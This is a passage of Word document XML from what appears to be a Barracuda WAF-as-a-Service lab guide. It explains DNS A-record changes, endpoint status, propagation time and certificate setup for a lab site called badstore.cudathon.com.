    <w:p w:rsidR="00844F45" w:rsidP="00072E2A" w:rsidRDefault="00844F45" w14:paraId="222D99F2" w14:textId="2DAF5494">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="4646B334">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">lick </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00844F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="19502B27" w:rsidP="520BA0FC" w:rsidRDefault="19502B27" w14:paraId="0DB49A67" w14:textId="480E3275">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="19502B27">
        <w:rPr/>
        <w:t>Change DNS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="211FEAB1" w:rsidP="16AED19E" w:rsidRDefault="211FEAB1" w14:paraId="22AD5C6B" w14:textId="2DD0AE65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="211FEAB1">
        <w:rPr/>
        <w:t>Wr</w:t>
      </w:r>
      <w:r w:rsidR="6B1ACFBC">
        <w:rPr/>
        <w:t xml:space="preserve">ite down </w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="1E84C02A">
        <w:rPr/>
        <w:t>IP Addre</w:t>
      </w:r>
      <w:r w:rsidR="1BBEF359">
        <w:rPr/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="1E84C02A">
        <w:rPr/>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t>under “C</w:t>
      </w:r>
      <w:r w:rsidR="296D434D">
        <w:rPr/>
        <w:t>urrent Record</w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="502BBCA0">
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="502BBCA0">
        <w:rPr/>
        <w:t xml:space="preserve"> you will need it </w:t>
      </w:r>
      <w:r w:rsidR="04BCB0B7">
        <w:rPr/>
        <w:t>later</w:t>
      </w:r>
      <w:r w:rsidR="502BBCA0">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="502BBCA0" w:rsidP="16AED19E" w:rsidRDefault="502BBCA0" w14:paraId="3AC3E94C" w14:textId="1F95A5D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="502BBCA0">
        <w:rPr/>
        <w:t>Write down the IP Addre</w:t>
      </w:r>
      <w:r w:rsidR="1BBEF359">
        <w:rPr/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="502BBCA0">
        <w:rPr/>
        <w:t xml:space="preserve">s under “Change A Record To”, you will need it soon. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00844F45" w:rsidP="21B1CB40" w:rsidRDefault="00844F45" w14:paraId="09ED0CA5" w14:textId="787C65FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="4D153ED8">
        <w:rPr/>
        <w:t>Only after writing these down, c</w:t>
      </w:r>
      <w:r w:rsidR="00844F45">
        <w:rPr/>
        <w:t xml:space="preserve">lick </w:t>
      </w:r>
      <w:r w:rsidRPr="16AED19E" w:rsidR="00844F45">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="482C56DC" w:rsidP="16AED19E" w:rsidRDefault="482C56DC" w14:paraId="5F29B43A" w14:textId="7EF55E0A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="520BA0FC" w:rsidRDefault="520BA0FC" w14:paraId="3E7B4CE6" w14:textId="0F3F6ED6">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7ADBD198" w:rsidP="520BA0FC" w:rsidRDefault="7ADBD198" w14:paraId="1178CA79" w14:textId="7AD2589D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="7ADBD198">
        <w:rPr/>
        <w:t>Endpoints Setup</w:t>
      </w:r>
      <w:r w:rsidR="670EEFFC">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B84E9B2" w:rsidP="520BA0FC" w:rsidRDefault="6B84E9B2" w14:paraId="4AABA22A" w14:textId="28D3A24B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="6B84E9B2">
        <w:rPr/>
        <w:t xml:space="preserve">After finishing the </w:t>
      </w:r>
      <w:r w:rsidR="014C4F57">
        <w:rPr/>
        <w:t>Add Application workflow</w:t>
      </w:r>
      <w:r w:rsidR="6B84E9B2">
        <w:rPr/>
        <w:t>, y</w:t>
      </w:r>
      <w:r w:rsidR="7ADBD198">
        <w:rPr/>
        <w:t xml:space="preserve">ou will </w:t>
      </w:r>
      <w:r w:rsidR="2C816D8F">
        <w:rPr/>
        <w:t>be taken to</w:t>
      </w:r>
      <w:r w:rsidR="7ADBD198">
        <w:rPr/>
        <w:t xml:space="preserve"> the Endpoints Screen which will look like this</w:t>
      </w:r>
      <w:r w:rsidR="3F2A07A0">
        <w:rPr/>
        <w:t>.  There are no lab steps to complete here, this is purely informational, the next lab steps you will be working on are found in the “Servers” section below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="520BA0FC" w:rsidP="5BDB08D7" w:rsidRDefault="520BA0FC" w14:paraId="314B28BA" w14:textId="48B87612">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="2A06B891">
        <w:drawing>
          <wp:inline wp14:editId="1832EAC4" wp14:anchorId="4A48B32C">
            <wp:extent cx="5943600" cy="1543050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2007851703" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rdf21db53f32c48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543050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="710918EC" w:rsidP="520BA0FC" w:rsidRDefault="710918EC" w14:paraId="50C3F14F" w14:textId="4ED158C9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="710918EC">
        <w:rPr/>
        <w:t xml:space="preserve">The “DNS Update Pending” and “Setting Up Certificate” </w:t>
      </w:r>
      <w:r w:rsidR="2001F4CB">
        <w:rPr/>
        <w:t xml:space="preserve">status </w:t>
      </w:r>
      <w:r w:rsidR="46839591">
        <w:rPr/>
        <w:t>indicate</w:t>
      </w:r>
      <w:r w:rsidR="710918EC">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="710918EC">
        <w:rPr/>
        <w:t>you now need to</w:t>
      </w:r>
      <w:r w:rsidR="4E7CC64B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4E7CC64B">
        <w:rPr/>
        <w:t xml:space="preserve">help the customer </w:t>
      </w:r>
      <w:r w:rsidR="4449A0B4">
        <w:rPr/>
        <w:t xml:space="preserve">log in to the </w:t>
      </w:r>
      <w:r w:rsidR="56617E5E">
        <w:rPr/>
        <w:t>authoritative</w:t>
      </w:r>
      <w:r w:rsidR="4449A0B4">
        <w:rPr/>
        <w:t xml:space="preserve"> name server for </w:t>
      </w:r>
      <w:r w:rsidR="0EB79789">
        <w:rPr/>
        <w:t xml:space="preserve">their domain </w:t>
      </w:r>
      <w:r w:rsidR="0EB79789">
        <w:rPr/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="0EB79789">
        <w:rPr/>
        <w:t xml:space="preserve">in this case, </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="4C7EACA7">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>cudathon</w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="4C7EACA7">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="300661BD">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4866F40B">
        <w:rPr/>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="4866F40B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4449A0B4">
        <w:rPr/>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="368FE314">
        <w:rPr/>
        <w:t>chang</w:t>
      </w:r>
      <w:r w:rsidR="710918EC">
        <w:rPr/>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="38385EE3">
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="77C642B9">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="710918EC">
        <w:rPr/>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidR="7A222F55">
        <w:rPr/>
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:r w:rsidR="710918EC">
        <w:rPr/>
        <w:t xml:space="preserve"> record for </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="4E460DE5">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>badstore</w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="4E460DE5">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">.cudathon.com </w:t>
      </w:r>
      <w:r w:rsidR="1B3B81BF">
        <w:rPr/>
        <w:t xml:space="preserve">to point to the </w:t>
      </w:r>
      <w:r w:rsidR="0300990E">
        <w:rPr/>
        <w:t>newly-allocated</w:t>
      </w:r>
      <w:r w:rsidR="0300990E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0F2B2FAC">
        <w:rPr/>
        <w:t>Endpoint</w:t>
      </w:r>
      <w:r w:rsidR="1B3B81BF">
        <w:rPr/>
        <w:t xml:space="preserve"> IP address</w:t>
      </w:r>
      <w:r w:rsidR="1B8C21BF">
        <w:rPr/>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="681E03F4">
        <w:rPr/>
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidR="1B8C21BF">
        <w:rPr/>
        <w:t>wait for that DNS change to propagate throughout the Interne</w:t>
      </w:r>
      <w:r w:rsidR="282BEDA2">
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="1B8C21BF">
        <w:rPr/>
        <w:t xml:space="preserve"> DNS hierarchy</w:t>
      </w:r>
      <w:r w:rsidR="7930B73B">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7930B73B" w:rsidP="520BA0FC" w:rsidRDefault="7930B73B" w14:paraId="01D2354D" w14:textId="51F4D393">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="7930B73B">
        <w:rPr/>
        <w:t xml:space="preserve">WAF-as-a-Service will repeatedly try to resolve </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="7930B73B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>badstore</w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="7930B73B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>.cudathon.com</w:t>
      </w:r>
      <w:r w:rsidR="7930B73B">
        <w:rPr/>
        <w:t xml:space="preserve"> until it resolves to the Endpoint IP Address.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7930B73B" w:rsidP="520BA0FC" w:rsidRDefault="7930B73B" w14:paraId="3079761A" w14:textId="545CE5FE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidR="7930B73B">
        <w:rPr/>
        <w:t>Even after the customer has made the change, the propagation from the customer’s name server to enough of the Internet DNS hierarchy can</w:t>
      </w:r>
      <w:r w:rsidR="039C011B">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="039C011B">
        <w:rPr/>
        <w:t>take a</w:t>
      </w:r>
      <w:r w:rsidR="5FD41AD7">
        <w:rPr/>
        <w:t>nywhere from 15 minutes to 48 hours depending on which name server they use</w:t>
      </w:r>
      <w:r w:rsidR="553135D1">
        <w:rPr/>
        <w:t xml:space="preserve"> and a few other factors such as TTL preference, some customers may have long TTL </w:t>
      </w:r>
      <w:r w:rsidR="553135D1">
        <w:rPr/>
        <w:t>preferences</w:t>
      </w:r>
      <w:r w:rsidR="553135D1">
        <w:rPr/>
        <w:t xml:space="preserve"> and some customers may have short TTL preferences.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="54D9F96B" w:rsidP="520BA0FC" w:rsidRDefault="54D9F96B" w14:paraId="14F955A8" w14:textId="77B2C416">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="08036E22" w:rsidR="54D9F96B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NOTE</w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="54D9F96B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: In this lab, we are using IP addresses, but in real life, you will use </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="0914A931">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="54D9F96B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">CNAME </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="19A503FB">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">record </w:t>
      </w:r>
      <w:r w:rsidRPr="08036E22" w:rsidR="54D9F96B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>instead, more information on that is on the documentation page here https://campus.barracuda.com/product/WAAS/doc/77399164/getting-started/#h4_2fa6a4bc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1C18C397" w:rsidP="520BA0FC" w:rsidRDefault="1C18C397" w14:paraId="70659C20" w14:textId="338D7EDB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="1C18C397">
        <w:rPr/>
        <w:t xml:space="preserve">Once </w:t>
      </w:r>
      <w:r w:rsidR="2899A9A3">
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="4E123D06">
        <w:rPr/>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="2899A9A3">
        <w:rPr/>
        <w:t xml:space="preserve">DNS change has propagated enough to where WAF-as-a-Service can </w:t>
      </w:r>
      <w:r w:rsidR="005ED454">
        <w:rPr/>
        <w:t xml:space="preserve">it, The </w:t>
      </w:r>
      <w:r w:rsidR="005ED454">
        <w:rPr/>
        <w:t>Lets</w:t>
      </w:r>
      <w:r w:rsidR="005ED454">
        <w:rPr/>
        <w:t xml:space="preserve"> Encrypt process will run, </w:t>
      </w:r>
      <w:r w:rsidR="1C18C397">
        <w:rPr/>
        <w:t xml:space="preserve">there will be a valid SSL Certificate and the “DNS Update Pending” </w:t>
      </w:r>
      <w:r w:rsidR="5AEBB06D">
        <w:rPr/>
        <w:t xml:space="preserve">status </w:t>
      </w:r>
      <w:r w:rsidR="1C18C397">
        <w:rPr/>
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidR="256CE68C">
        <w:rPr/>
        <w:t>be replaced with the status “Configured” as shown here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="256CE68C" w:rsidP="520BA0FC" w:rsidRDefault="256CE68C" w14:paraId="031C4EAF" w14:textId="34616B9F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r w:rsidR="256CE68C">
        <w:drawing>
          <wp:inline wp14:editId="001ED99A" wp14:anchorId="2D9CD198">
            <wp:extent cx="5943600" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="961162938" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rf054565fa99e436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685925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="6936753A">
        <w:rPr/>
        <w:t>More information on this is available</w:t>
      </w:r>
      <w:r w:rsidR="6746A439">
        <w:rPr/>
        <w:t xml:space="preserve"> here </w:t>
      </w:r>
      <w:r w:rsidR="6936753A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R549a3f4da168404f">
        <w:r w:rsidRPr="4CBE4E3E" w:rsidR="6936753A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://campus.barracuda.com/product/WAAS/doc/76284376/endpoints</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="1D43E98F">
        <w:rPr/>
        <w:t xml:space="preserve"> and here </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="63CAF094" w:rsidP="520BA0FC" w:rsidRDefault="63CAF094" w14:paraId="45829D5E" w14:textId="751A7B62">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="63CAF094">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="4C595561">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">In this lab we will </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="37360706">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="1B3B81BF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">do the </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="2635B382">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">A record </w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="00F04907">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>change</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="1B3B81BF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the following good reasons</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="3EC5F430">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>, but don’t worry, the lab will still work</w:t>
      </w:r>
      <w:r w:rsidRPr="5BDB08D7" w:rsidR="1B3B81BF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3B81BF" w:rsidP="520BA0FC" w:rsidRDefault="1B3B81BF" w14:paraId="2E6BEE31" w14:textId="5BF271C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>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1B3B81BF">
        <w:rPr/>
        <w:t xml:space="preserve">If there is more than one student doing this lab at the same time, they are all using the same domain name </w:t>
      </w:r>
      <w:r w:rsidR="1B3B81BF">
        <w:rPr/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="5C0AF42E">
        <w:rPr/>
        <w:t>badstore.cudathon.com</w:t>
      </w:r>
      <w:r w:rsidR="5C0AF42E">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1B3B81BF">
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="2563658B">
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="133BF861">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="39BDF950">
        <w:rPr/>
        <w:t xml:space="preserve">it is not going to work to try to make that </w:t>
      </w:r>
      <w:r w:rsidR="133BF861">
        <w:rPr/>
        <w:t xml:space="preserve">domain name </w:t>
      </w:r>
      <w:r w:rsidR="526D8368">
        <w:rPr/>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="133BF861">
        <w:rPr/>
        <w:t xml:space="preserve">point to </w:t>
      </w:r>
      <w:r w:rsidR="5B49180B">
        <w:rPr/>
        <w:t xml:space="preserve">each students’ </w:t>
      </w:r>
      <w:r w:rsidR="133BF861">
        <w:rPr/>
        <w:t xml:space="preserve">different Endpoint </w:t>
      </w:r>
      <w:r w:rsidR="08F440FD">
        <w:rPr/>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="133BF861">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7B6C6BD2">
        <w:rPr/>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="133BF861">
        <w:rPr/>
        <w:t>ddress</w:t>
      </w:r>
      <w:r w:rsidR="5F872EEA">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6714DC88" w:rsidP="520BA0FC" w:rsidRDefault="6714DC88" w14:paraId="7654F682" w14:textId="241DA01F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t xml:space="preserve">The students </w:t>
      </w:r>
      <w:r w:rsidR="0D59941F">
        <w:rPr/>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t xml:space="preserve">and instructors </w:t>
      </w:r>
      <w:r w:rsidR="4597E2EC">
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t xml:space="preserve">don’t </w:t>
      </w:r>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidR="34D4C07B">
        <w:rPr/>
        <w:t xml:space="preserve">admin </w:t>
      </w:r>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t xml:space="preserve">rights to change the </w:t>
      </w:r>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t>cudastore.com domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6714DC88" w:rsidP="520BA0FC" w:rsidRDefault="6714DC88" w14:paraId="7F146DB0" w14:textId="234D1208">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6714DC88">
        <w:rPr/>
        <w:t>Even if you changed the record on the DNS server right now,</w:t>
      </w:r>
      <w:r w:rsidR="5C87814B">
        <w:rPr/>
        <w:t xml:space="preserve"> and even though cudastore.com is hosted one of on the fastest</w:t>
      </w:r>
      <w:r w:rsidR="15B14CCC">
        <w:rPr/>
        <w:t>-propagating</w:t>
      </w:r>
      <w:r w:rsidR="5C87814B">
        <w:rPr/>
        <w:t xml:space="preserve"> name servers</w:t>
      </w:r>
      <w:r w:rsidR="7E93E27A">
        <w:rPr/>
